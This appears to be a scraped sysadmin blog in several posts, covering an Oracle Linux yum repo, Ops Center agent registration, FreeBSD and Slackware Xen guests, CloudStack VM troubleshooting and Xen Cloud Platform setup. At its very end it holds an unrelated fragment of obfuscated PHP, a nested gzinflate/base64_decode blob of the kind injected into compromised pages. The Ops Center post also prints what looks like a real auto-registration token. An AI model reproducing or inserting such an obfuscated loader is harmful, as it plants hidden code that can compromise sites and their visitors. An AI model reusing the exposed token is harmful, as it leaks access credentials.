name=Oracle Linux $releasever Update 3 installation media copy ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/3/base/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_UEK_latest]
name=Latest Unbreakable Enterprise Kernel for Oracle Linux $releasever ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/UEK/latest/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=1
 
[ol6_UEK_base]
name=Unbreakable Enterprise Kernel for Oracle Linux $releasever ($basearch)
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/UEK/base/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
 
[ol6_playground_latest]
name=Latest mainline stable kernel for Oracle Linux 6 ($basearch) - Unsupported 
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/playground/latest/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=0
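
With the repo file in place (ol6_latest and ol6_UEK_latest enabled above), the upgrade itself is the usual:

# yum repolist
# yum update -y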


A little holiday adventure from the kebonbinatang pens into the Enterprise world.. 8-}

Provisioning, installing, updating, monitoring, reporting on huge infrastructure a.k.a. Enterprise. cmiiw.
With the basic ingredients:
- Solaris 10 ( SPARC & x86 )
- Oracle Linux
- Ops Center

Register Asset (Manual Discovery) via Token:
On the Enterprise Manager:

# cat /var/opt/sun/xvm/persistence/scn-proxy/connection.properties
.....
.....
.....
client-reg-id=urn\:scn\:clregid\:cab06a54-f561-46e7-bebb-cefbfc7ba8ba\:20121224042647994
trust-store=/var/opt/sun/xvm/security/jsse/scn-proxy/truststore
description=Local Proxy Controller
auto-reg-token=0c8d556f-9b8e-4210-9299-ea82f450f40a\:1387904400000\:T

Generate Token:

# echo "0c8d556f-9b8e-4210-9299-ea82f450f40a:1387904400000:T" > ~/TOKET_TETE

On Client Agent:

# /opt/SUNWxvmoc/bin/agentadm configure -t ~/TOKET_TETE  -x 10.0.5.1 
agentadm: Version 12.1.2.2162 launched with args: configure -t /token -x 10.0.5.1
 
Validating step : workarounds configure  -t ~/TOKET_TETE -x 10.0.5.1   
Validating step : db configure  -t ~/TOKET_TETE -x 10.0.5.1   
/var/run/cacao/instances/scn-agent/run/*.pid: No such file or directory
Validating step : sc_console configure  -t ~/TOKET_TETE -x 10.0.5.1   
verified sc_console command is OK 
Validating step : setup_hmp configure    -t ~/TOKET_TETE 
Validating step : scn_agent configure    
scn_agent Common Agent Container environment is OK 
Validating step : setup_net configure    
skipping setup_net step for zone VC. 
Validating step : uce_agent configure    
Validating step : config_sysconfig configure    
Validating step : final configure    
End of validation 
 
executing step : workarounds 
workaround  configuration done. 
 
executing step : db 
/var/run/cacao/instances/scn-agent/run/*.pid: No such file or directory
configuring db 
INFO: hd_domain_vc_agent_db.sh decrypted the password.
Java DB creation and initialization for Domain Model successful
configuring jobs db 
INFO: hd_jobs_vc_agent_db.sh decrypted the password.
Java DB creation and initialization for job manager successful
INFO: db decrypted the password.

ref: http://www.oracle.com/technetwork/oem/ops-center/index.html



FreeBSD XEN domU

  ozzie / 06/12/2012

Create the virtual disk image:

# truncate -s 2048M freebsd.img

Partition, label & newfs the virtual disk:

# mdconfig -f freebsd.img
# fdisk -B md0
# bsdlabel -wB md0s1
# newfs -U md0s1a

Mount it & build world plus the XEN kernel:

# mount /dev/md0s1a /mnt
# csup -h freebsd.iconpln.net.id  -L 2 /usr/share/examples/cvsup/standard-supfile
# export MAKEOBJDIRPREFIX=/tmp/compile.source
# cd /usr/src
# make buildworld 
# make buildkernel KERNCONF=XEN
# export DESTDIR=/mnt
# make installworld 
# make installkernel KERNCONF=XEN 
# cd /usr/src/etc 
# make distribution

Prepare for booting the guest later.
/mnt/etc/fstab:

/dev/xbd0       /               ufs     rw              1       1

/mnt/etc/ttys

xc0     "/usr/libexec/getty Pc"         vt100   on  secure

Copy the compiled kernel out so dom0 can boot the guest with it:

# cp /mnt/boot/kernel/kernel /some/place/freebsd-kernel

Unmount & destroy the md device:

# umount /mnt
# mdconfig -d -u md0
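
The walk-through stops at the image; to boot the domU a guest config is still needed. A minimal sketch under stated assumptions: the kernel path matches the copy step above, and the disk & root device names must agree with what the XEN kernel and the fstab written earlier expect:

# /etc/xen/freebsd.cfg
name   = "freebsd"
memory = "256"
kernel = "/some/place/freebsd-kernel"
disk   = ['file:/virtual/freebsd.img,xvda,w']
vif    = ['bridge=xenbr0']
# root device naming is an assumption; keep it consistent with /mnt/etc/fstab
extra  = "vfs.root.mountfrom=ufs:/dev/xbd0s1a"

then start it with: xm create freebsd -c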


monitoring with Observium

  ozzie / 12/11/2012

Of the many web-based monitoring applications { cacti | jffnms | mrtg | nagios | munin | monit | opennms | etc },
Observium is arguably fairly complete, light & informative.. cmiiw :D

The installation process is relatively easy.. cmiiw :D that's all.. this much for now.. hihihi



Unable to start VM [cloudstack]

  ozzie / 02/11/2012

Here are a few error messages you may have run into when there are lots of VMs on CloudStack hosts:

WARN  [xen.resource.CitrixResourceBase] (DirectAgent-318:null) Task failed! Task record:                 uuid: 7d57a198-339b-7588-9678-fcc9442d1a85
           nameLabel: Async.VM.start_on
     nameDescription: 
   allowedOperations: []
   currentOperations: {}
             created: Thu Nov 01 22:06:24 WIT 2012
            finished: Thu Nov 01 22:05:58 WIT 2012
              status: FAILURE
          residentOn: com.xensource.xenapi.Host@658287be
            progress: 1.0
                type: <none/>
              result: 
           errorInfo: [SR_BACKEND_FAILURE_46, , The VDI is not available [opterr=VDI 97e7ccc0-38de-4e80-b8ef-1aa4a2fb1c39 already attached RW]]
         otherConfig: {}
           subtaskOf: com.xensource.xenapi.Task@aaf13f6f
            subtasks: []
 
WARN  [xen.resource.CitrixResourceBase] (DirectAgent-318:null) Unable to start VM(i-2-37-VM) on host(42ee82e2-37ef-4f06-a142-13415e377e15) due to Task failed! Task record:                 uuid: 7d57a198-339b-7588-9678-fcc9442d1a85
           nameLabel: Async.VM.start_on
     nameDescription: 
   allowedOperations: []
   currentOperations: {}
             created: Thu Nov 01 22:06:24 WIT 2012
            finished: Thu Nov 01 22:05:58 WIT 2012
              status: FAILURE
          residentOn: com.xensource.xenapi.Host@658287be
            progress: 1.0
                type: <none/>
              result: 
           errorInfo: [SR_BACKEND_FAILURE_46, , The VDI is not available [opterr=VDI 97e7ccc0-38de-4e80-b8ef-1aa4a2fb1c39 already attached RW]]
         otherConfig: {}
           subtaskOf: com.xensource.xenapi.Task@aaf13f6f
            subtasks: []
 
Task failed! Task record:                 uuid: 7d57a198-339b-7588-9678-fcc9442d1a85
           nameLabel: Async.VM.start_on
     nameDescription: 
   allowedOperations: []
   currentOperations: {}
             created: Thu Nov 01 22:06:24 WIT 2012
            finished: Thu Nov 01 22:05:58 WIT 2012
              status: FAILURE
          residentOn: com.xensource.xenapi.Host@658287be
            progress: 1.0
                type: <none/>
              result: 
           errorInfo: [SR_BACKEND_FAILURE_46, , The VDI is not available [opterr=VDI 97e7ccc0-38de-4e80-b8ef-1aa4a2fb1c39 already attached RW]]
         otherConfig: {}
           subtaskOf: com.xensource.xenapi.Task@aaf13f6f
            subtasks: []
 
	at com.cloud.hypervisor.xen.resource.CitrixResourceBase.checkForSuccess(CitrixResourceBase.java:2768)
	at com.cloud.hypervisor.xen.resource.CitrixResourceBase.startVM(CitrixResourceBase.java:2880)
	at com.cloud.hypervisor.xen.resource.CitrixResourceBase.execute(CitrixResourceBase.java:1107)
	at com.cloud.hypervisor.xen.resource.CitrixResourceBase.executeRequest(CitrixResourceBase.java:466)
	at com.cloud.hypervisor.xen.resource.XenServer56Resource.executeRequest(XenServer56Resource.java:69)
	at com.cloud.agent.manager.DirectAgentAttache$Task.run(DirectAgentAttache.java:187)
	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:471)
	at java.util.concurrent.FutureTask$Sync.innerRun(FutureTask.java:334)
	at java.util.concurrent.FutureTask.run(FutureTask.java:166)
	at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$101(ScheduledThreadPoolExecutor.java:165)
	at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:266)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1110)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:603)
	at java.lang.Thread.run(Thread.java:679)

1. Check the UUID & VM with xe vdi-list:

xe vdi-list | grep -i <VM-NAME> -B2 -A2

2. Forget the virtual disk matching that UUID:

xe vdi-forget uuid=<VDI-UUID>

3. Rescan the SR:

xe sr-scan uuid=<SR-UUID>

4. start the VM:
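
With the same placeholder style as the steps above:

xe vm-start uuid=<VM-UUID>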


Hope this is useful. :D



IaaS with CloudStack

  ozzie / 13/07/2012

The story of building a cloud in several pens of kebonbinatang.org.

In the beginning the difficulty really was the hardware infrastructure..



Xen Cloud Platform

  ozzie / 16/02/2012

Download & Install XCP [http://xen.org/products/cloudxen.html]


Create the LVM disk SR:

# xe sr-create type=lvm content-type=user \
  device-config:device=/dev/disk/by-id/cciss-part3 \
  name-label="local SR"

Create & mount the ISO repository:

# mkfs.ext3 /dev/sda2
# mkdir /mnt/iso
# mount /dev/sda2 /mnt/iso/
# xe-mount-iso-sr /mnt/iso/ -o bind

Download & install XenCenter / OpenXenManager.



Slackware guestOs @ XEN

  ozzie / 15/09/2011

A bit of documentation from tinkering with Slackware as a guest on XEN.

Prepare the virtual disks (in this example just a 2 GB root & 512 MB swap):

# mkdir -p /virtual/
# cd /virtual/
# dd if=/dev/zero of=/virtual/root0.img oflag=direct bs=1M seek=2047 count=1
# dd if=/dev/zero of=/virtual/swap0.img oflag=direct bs=1M seek=512 count=0

Download a pre-built kernel & installer initrd:

wget http://blog.ozzie.web.id/pub/xen/kernel/vmlinOZ
wget http://kambing.ui.ac.id/slackware/slackware-13.37/isolinux/initrd.img

Create configuration: /etc/xen/darkstar.cfg

name = "darkstar"
memory = "128"
kernel = "/vmlinOZ"
ramdisk = "/initrd.img"
disk =['file:/virtual/root0.img,xvda,w','file:/virtual/swap0.img,xvdb,w' ,'file:/slackware-13.37-install-d1.iso,xvdc:cdrom,r']
vif = [ 'bridge=xenbr0,script=vif-bridge' ]
vcpus = "1"
extra = "load_ramdisk=1 prompt_ramdisk=0 rw"
extra = "root=/dev/xvda1 ro"

Start the guest:

cd /etc/xen/
xm create darkstar -c

Perform the installation as usual.








".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>